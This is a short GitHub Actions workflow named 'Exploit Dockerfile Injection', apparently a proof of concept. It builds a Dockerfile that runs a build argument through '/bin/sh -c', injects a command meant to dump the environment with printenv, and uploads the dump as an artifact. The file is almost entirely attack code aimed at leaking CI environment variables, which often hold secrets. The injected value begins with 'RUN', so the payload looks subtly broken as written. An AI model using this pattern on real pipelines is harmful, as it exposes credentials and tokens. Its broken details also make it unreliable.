name: Exploit Dockerfile Injection

on:
  workflow_dispatch:

jobs:
  exploit:
    runs-on: ubuntu-latest
    env:
      PYTHON_VERSION: 'RUN printenv > /env_dump.txt'

    steps:
      - name: Create malicious Dockerfile
        run: |
          echo "FROM alpine" > Dockerfile
          echo "ARG PYTHON_VERSION" >> Dockerfile
          echo "RUN echo Injecting... && /bin/sh -c \"\$PYTHON_VERSION\"" >> Dockerfile

      - name: Build Docker image
        run: docker build --build-arg PYTHON_VERSION="$PYTHON_VERSION" -t injected-image .

      - name: Extract /env_dump.txt from image
        run: docker run --rm injected-image cat /env_dump.txt > env_dump.txt

      - name: Upload dump as artifact
        uses: actions/upload-artifact@v4
        with:
          name: env_dump
          path: env_dump.txt
